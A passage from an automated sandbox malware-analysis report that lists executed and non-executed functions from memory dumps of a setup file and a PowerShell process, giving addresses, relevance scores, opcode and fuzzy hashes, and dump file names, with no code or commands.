                                                                                                                                                                                              • Instruction ID: bed8fdeb04d6890cf9762007fdaf6bfa2e22bdb6e7780ac7789e73d7838bdbb9
                                                                                                                                                                                              • Opcode Fuzzy Hash: f53ba6420f9f43fe9e0db5d36366ef6edcd796af54228b74a54863d83e8348a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001263834D3059BD7189B51DCD15BAF3B6EBDA311F246C3CA09207266C6B5C8458B16
                                                                                                                                                                                              Function 00918437 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 11f8bbf734cf5a287c76ae8de7de0b824c6e7a31d5c82def3c58ba0426c33b91
                                                                                                                                                                                              • Instruction ID: fe7f578b92006478594cb20343d776f5c85af8ff596e709a4fd0e5bc46d7eac5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 11f8bbf734cf5a287c76ae8de7de0b824c6e7a31d5c82def3c58ba0426c33b91
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF054647087928BD727462D4020276BFE14F9B641F0C85D9E8D15B3E2C92A8D4A9765
                                                                                                                                                                                              Function 00905E8E Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                              • Instruction ID: 0426de2a331eadd0dfab2c5611d551f7ec4132899c74cb5d1cee6824edf1fbdc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E01D67BA017128BC324CE5CC4D06ABB3B4FF85794B1B446DD5815F3B1DB319D158660
                                                                                                                                                                                              Function 009176BC Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1f833ac728eaa02a1bc5462d3afabdad92549209b647dc7f8cff3374a10af133
                                                                                                                                                                                              • Instruction ID: 42ae1eecd5a40c783d68c3d072f9c1bf7ecf2eb4abc386dad8b2d5d76aed07ad
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f833ac728eaa02a1bc5462d3afabdad92549209b647dc7f8cff3374a10af133
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF01243964C3149BD7148F21D8D10AAF3B5EF9A311F14A82CE4D2072A6CAB8D84A8B56
                                                                                                                                                                                              Function 008F3E55 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8471ca61dec84cce03ebf3d692c7263c07cfd1a60fa468610ed0efeaf2eb68d9
                                                                                                                                                                                              • Instruction ID: 2522da9f89f90a459fe0da91259fa01085e247728a03d0b9ea1acf69636116ec
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8471ca61dec84cce03ebf3d692c7263c07cfd1a60fa468610ed0efeaf2eb68d9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 57F05C6260C10C4BCF284E3844E03B9F7B3EED7314718812DE2D6CB65AC631D64AD698
                                                                                                                                                                                              Function 008F0CC1 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                              • Instruction ID: 878debcd7968aed962de3832e8263db5e812ddf30b0b19ef1e46a3e6cceb62c9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A01A434A0110CEFCB14EFA8C684AADB7B5FB44315F708299D905AB386D730AE41DF90
                                                                                                                                                                                              Function 0090AC25 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: da0c50d66ddfded598c519d4c17e3581749aca29ae3bede9d2f214f3bf2e655c
                                                                                                                                                                                              • Instruction ID: 9fa5722941b97cf45d9156644e5ccc66b7b43d3d1e1c61d1d0b35af963629d22
                                                                                                                                                                                              • Opcode Fuzzy Hash: da0c50d66ddfded598c519d4c17e3581749aca29ae3bede9d2f214f3bf2e655c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03F08CB190531AEFCB208F80C851AABBBF1FF4A750F048459F8898B220E330C951DB95
                                                                                                                                                                                              Function 009147DE Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 62fe03a000639e215479e67941504b3fa6485a86cefae2677c2b7a89a3c3a8a8
                                                                                                                                                                                              • Instruction ID: cb50e61f15daa002ea018f7bbd85eaed4588951030c70a362db07609565b3d31
                                                                                                                                                                                              • Opcode Fuzzy Hash: 62fe03a000639e215479e67941504b3fa6485a86cefae2677c2b7a89a3c3a8a8
                                                                                                                                                                                              • Instruction Fuzzy Hash: ECC04C3454D2908FC345CF24D891A75BB75AF8B204B24B585C18467266C230E411C75D
                                                                                                                                                                                              Function 0092E92B Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bd50fc54169386f4dbfa7b269dc7ccc6cd1231e84d782bb37de4fc393b43472d
                                                                                                                                                                                              • Instruction ID: 208f5b9799af86ddf63ffa5a64644709595d29c801d9f5786d35319b588d347a
                                                                                                                                                                                              • Opcode Fuzzy Hash: bd50fc54169386f4dbfa7b269dc7ccc6cd1231e84d782bb37de4fc393b43472d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9ED0EA79A082018FC340DF08E880725B7B5AB8A210F25E469D888AB366D734E8569B49
                                                                                                                                                                                              Function 009128C1 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0f0a2b79a0d167f751aeb354a5ab8faebfc7c47af379afde6a631db0257b4b82
                                                                                                                                                                                              • Instruction ID: 1add9c18ce777fbd242c38dad0de147e18f23229356417e8d2c3e7e9c323e3c4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f0a2b79a0d167f751aeb354a5ab8faebfc7c47af379afde6a631db0257b4b82
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FB092A1C1B9148690123F242D036BAB038AD13210F042030E94762306B616E21A40DF
                                                                                                                                                                                              Function 0091668D Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 81b97254319e70bd58e50347d14d2bcddfce68d9a26a4c9f10f140a8973eacc4
                                                                                                                                                                                              • Instruction ID: 7475848487d886eff9887ed6b9e159b88075a5402fd4d4cc53d900655887cfa0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 81b97254319e70bd58e50347d14d2bcddfce68d9a26a4c9f10f140a8973eacc4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72B012508DD28247C2110E10D8C91B9F5396907115F2432EEC889AF0539A21C0A3464E
                                                                                                                                                                                              Function 00909224 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8f0000_@Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b49518c04e122dcdbd1440b5e1b8cc74ac51adac86039ee585854a115eb5c69f
                                                                                                                                                                                              • Instruction ID: 87af20a7c6acb7e062c104b5a8364b663eb83d0cde599457eee03b459e607602
                                                                                                                                                                                              • Opcode Fuzzy Hash: b49518c04e122dcdbd1440b5e1b8cc74ac51adac86039ee585854a115eb5c69f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 26B0123080B19CCEC3040F305018039FA716D43303F0070A0E0C4B3010C771C501DA0D

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 079F1798 Relevance: 14.6, Strings: 11, Instructions: 811COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2094490385.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_79f0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                              • API String ID: 0-2551064546
                                                                                                                                                                                              • Opcode ID: df0e072b44ccf53b96f0db64b318b68ee225c1c052b92a1b658a6ed8741befda
                                                                                                                                                                                              • Instruction ID: 02a070679b20bede48a0e17b1f840484c64cbb00ff0d90bd564831bbd96a8fd4
                                                                                                                                                                                              • Opcode Fuzzy Hash: df0e072b44ccf53b96f0db64b318b68ee225c1c052b92a1b658a6ed8741befda
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C4258B1B4431ACFC7258B68980176ABBBAAFC2318F14846AD605DF351DB32DD85C7D2
                                                                                                                                                                                              Function 04BB5E30 Relevance: .6, Instructions: 603COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2079480389.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4bb0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3a71adc2bcc0464cc86b9df391da754c84b5ad0d2b657a3745f91b8990214b56
                                                                                                                                                                                              • Instruction ID: ba3c3e8a3c0472f22b44fb4ac2bff33a358bf93f11d062c9d133b5696cea74b3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a71adc2bcc0464cc86b9df391da754c84b5ad0d2b657a3745f91b8990214b56
                                                                                                                                                                                              • Instruction Fuzzy Hash: FA423B74A002099FCB15CF98C484AAEFBF2FF88314F258599E845AB365C775EC81CB91
                                                                                                                                                                                              Function 04BB2F78 Relevance: .5, Instructions: 467COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2079480389.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4bb0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4e387051039e088821ef4c5996e5fbe8521a60258039f92d8c1c5e8a94f63a0d
                                                                                                                                                                                              • Instruction ID: 889606aa2afefd2b062aae478f1854d2e7c9479277168dc2351d1941e91d71f9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e387051039e088821ef4c5996e5fbe8521a60258039f92d8c1c5e8a94f63a0d
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7122774A002099FCB15CF98C594AAEFBF2FF88310F258599E845AB365C775ED81CB90
                                                                                                                                                                                              Function 04BB4900 Relevance: .3, Instructions: 348COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2079480389.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4bb0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 02e528ef00d75a63994b15f93260f22c62231227f8d895f991acb2af6c925de1
                                                                                                                                                                                              • Instruction ID: ef4a07139dd97aaf0d73689bdffec5925d2ddfb6f7fbeee8c706f792c1eada40
                                                                                                                                                                                              • Opcode Fuzzy Hash: 02e528ef00d75a63994b15f93260f22c62231227f8d895f991acb2af6c925de1
                                                                                                                                                                                              • Instruction Fuzzy Hash: A8E16B34A052589FCB01CFA8D490AEEBBF1FF49310F258196E844AB366C775ED85CB94
                                                                                                                                                                                              Function 079F1A54 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2094490385.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_79f0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fd3f1cf239e36c248028f64fe800d45fd833fb1965cf80d31e68010dfa8c8093
                                                                                                                                                                                              • Instruction ID: af58d8b8c090e9fb48c2a7217e09a7de8f7998e8a7782308bb8d61cd847acfd9
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd3f1cf239e36c248028f64fe800d45fd833fb1965cf80d31e68010dfa8c8093
                                                                                                                                                                                              • Instruction Fuzzy Hash: F9415CF1B5030EDFCB248F688542B6A7BBAAF81359F058055D7009F255D731D850C7E1
                                                                                                                                                                                              Function 079F1A68 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2094490385.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_79f0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c609a0218af9d955eae2095796c8dd320e88a02c6ddc7abffb7061f6332f0a51
                                                                                                                                                                                              • Instruction ID: 125d71fd0e8237933edf1c308d4f85476e5a0983ee9c3dc0b12b9e22ab97afec
                                                                                                                                                                                              • Opcode Fuzzy Hash: c609a0218af9d955eae2095796c8dd320e88a02c6ddc7abffb7061f6332f0a51
                                                                                                                                                                                              • Instruction Fuzzy Hash: D13128F1B5030EDBCB248F288942B6A7BAAAF91359F158065DB009F295E736D841C7E1
                                                                                                                                                                                              Function 04BB33F0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2079480389.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4bb0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 328ec0b7ca8b9058cf2f5c3dbacc42586e5777b60be01c4df468de5633ffc549
                                                                                                                                                                                              • Instruction ID: f4b1b67df445dcc1f578595a79c020b65424c58c1cc7d53094c956c56b01fb9a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 328ec0b7ca8b9058cf2f5c3dbacc42586e5777b60be01c4df468de5633ffc549
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B4126B4A005059FCB0ACF98C195ABAFBF1FF48310B158599D845AB369C736FD90CBA0
                                                                                                                                                                                              Function 04BB3400 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2079480389.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4bb0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a78f982b9bdec5961306dc07cd8728de0ea9cf39dcbbd11ef2a3ae22740d478d
                                                                                                                                                                                              • Instruction ID: 5e3acabac4233311115951ece7cec4a02c634ecbbd3173db0867a46c739bd059
                                                                                                                                                                                              • Opcode Fuzzy Hash: a78f982b9bdec5961306dc07cd8728de0ea9cf39dcbbd11ef2a3ae22740d478d
                                                                                                                                                                                              • Instruction Fuzzy Hash: B94114B4A005059FCB09CF88C194ABAFBB1FF48310B1186A9D945AB368C736FD50CFA0
                                                                                                                                                                                              Function 04BB2AB0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2079480389.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4bb0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: f45305b3498374314e27d79ef982d5dc4ee3ba662963ce3f43a21ad4e308fd3a
                                                                                                                                                                                              • Instruction ID: de6eadf787b1da43855eff129d68ea9105baf9b1e65f9ca929fabfd639ba063b
                                                                                                                                                                                              • Opcode Fuzzy Hash: f45305b3498374314e27d79ef982d5dc4ee3ba662963ce3f43a21ad4e308fd3a
                                                                                                                                                                                              • Instruction Fuzzy Hash: BD212A74A006099FCB05CF59C9949AEFBB1FF49310B248596E559EB361C735FC42CBA0
                                                                                                                                                                                              Function 04BB2AA9 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2079480389.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4bb0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 936cb8b8f82f24c66d692d439a0d420895c6c92b1a276600867dd41c9f1844e8
                                                                                                                                                                                              • Instruction ID: fc33a43d39543b0879f460a2bba63ffd4dff47ee39919b4f4ab3e544957d8f83
                                                                                                                                                                                              • Opcode Fuzzy Hash: 936cb8b8f82f24c66d692d439a0d420895c6c92b1a276600867dd41c9f1844e8
                                                                                                                                                                                              • Instruction Fuzzy Hash: C721F574A005099FCB14CF98C584AAEFBB1FF48310B2485A9E959EB361C731ED41CFA0
                                                                                                                                                                                              Function 04BB48F1 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2079480389.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4bb0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9eb59a0c2ac4eefde9a49c30a66cb79a4eeb6e1dad5af4ca878210ddaa1c6f47
                                                                                                                                                                                              • Instruction ID: b49e7d462af52562c6500e80a5d065425e999128b195b4c2625a3942ec256c26
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eb59a0c2ac4eefde9a49c30a66cb79a4eeb6e1dad5af4ca878210ddaa1c6f47
                                                                                                                                                                                              • Instruction Fuzzy Hash: A1211A74A002498FCB00CF9CD5949AEFBF5FF89310B1585A9E999AB352C731ED41CBA0
                                                                                                                                                                                              Function 0323D006 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2078233968.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_323d000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 77c16f408a8e792296edee5e64483d96c9d35740e4f5b7dd57bc45a2b5bf4e2b
                                                                                                                                                                                              • Instruction ID: 8483b2fe3226b5b006bbbc1544faa97616ecbf8d04a32520502eeccd9c4f4be3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 77c16f408a8e792296edee5e64483d96c9d35740e4f5b7dd57bc45a2b5bf4e2b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03011B7240D3809FD7128B25CC94792BFB8EF53624F1984DBD8848F197C2695885C772
                                                                                                                                                                                              Function 0323D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2078233968.000000000323D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0323D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_323d000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8ffc52dd49f081c780a433aab7d360b01c4f3b63e4e18e0e93443ade9e773ede
                                                                                                                                                                                              • Instruction ID: c29c49257886312c15be9200398e5698b75a954055764a41857c9daecd962aae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ffc52dd49f081c780a433aab7d360b01c4f3b63e4e18e0e93443ade9e773ede
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1401F7B14183009AE710CA25C9847A7FF9CDF42724F1CC469EC080A246C679D881C6B1

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 079F08A0 Relevance: 10.3, Strings: 8, Instructions: 316COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.2094490385.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_79f0000_powershell.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$#k$$^q$$^q$$^q
                                                                                                                                                                                              • API String ID: 0-2613667054
                                                                                                                                                                                              • Opcode ID: a0eac9f652d2d4911f854736b14f150c77cd816d3d136e0796831f9297b61fcc
                                                                                                                                                                                              • Instruction ID: e3b4c09a45fb491ca554337adde55b1120de06b2015928e1e21008139d4ae3d1
                                                                                                                                                                                              • Opcode Fuzzy Hash: a0eac9f652d2d4911f854736b14f150c77cd816d3d136e0796831f9297b61fcc
